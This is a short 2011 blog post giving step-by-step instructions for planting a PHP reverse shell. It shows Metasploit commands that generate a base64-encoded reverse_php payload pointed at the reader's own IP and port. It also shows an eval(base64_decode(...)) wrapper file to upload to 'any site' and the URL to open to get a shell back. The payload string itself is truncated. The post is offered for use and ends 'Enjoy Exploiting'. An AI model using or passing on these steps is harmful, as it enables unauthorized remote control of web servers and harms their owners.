Thursday, July 14, 2011

PHP Connect Back with ShellCode

First You need your IP Address Ready Besure that it is External IP Address Not internal
And a Random Port

Make sure that the PORT is OPEN in your Router

Now Enter into Metasploit and type the following command



msf > use payload/php/reverse_php
msf payload(reverse_php) > set LHOST YOUR_IP_ADDRESS
LHOST => YOUR_IP_ADDRESS
msf payload(reverse_php) > set LPORT YOUR_PORT
LPORT => YOUR_PORT
msf payload(reverse_php) > set ENCODER php/base64
ENCODER => php/base64
msf payload(reverse_php) > generate -t raw

Once you have done with above command it generates a Shell code which is encoded with Base64
Now copy the whole Generated string into a php file like this

<?
eval(base64_decode("CQkkaXBhZGRyPWxvbmcya....."));
?>

Now save the file as something.php and upload the file onto any site and open in the url

example:

if you have uploaded the file as shell.php

now open the url http://somesite.com/shell.php

Now you would get a shell back at your Metasploit
Enjoy Exploiting :)

Security Forever

0 comments for "PHP Connect Back with ShellCode"

Post a Comment

background